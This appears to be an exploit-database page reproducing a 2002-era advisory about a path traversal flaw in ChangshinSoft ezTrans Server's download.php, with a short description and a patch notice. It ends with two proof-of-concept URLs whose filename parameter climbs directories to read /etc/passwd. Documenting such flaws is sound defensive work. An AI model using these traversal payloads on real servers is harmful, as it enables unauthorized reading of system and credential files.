header-logo
Suggest Exploit
vendor:
ezTrans Server
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Disclosure
22
CWE
Product Name: ezTrans Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

ChangshinSoft ezTrans Server Arbitrary File Disclosure Vulnerability

ChangshinSoft ezTrans Server is vulnerable to an arbitrary file disclosure vulnerability. This vulnerability is due to a lack of proper input validation in the download.php script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request will contain a maliciously crafted filename parameter that will allow the attacker to view arbitrary files on the server. This may result in the disclosure of potentially sensitive information.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of ChangshinSoft ezTrans Server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8155/info

It has been reported that a problem in ChangshinSoft ezTrans Server exists in the download.php script that may allow an attacker to view arbitrary files. This may result in the disclosure of potentially sensitive information.

http://www.example.com/question/crm/download.php?filename=../../../../../../../../../../../../etc/passwd

http://www.example.com/download.php?filename=../../../../../../../../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR

cqrsecured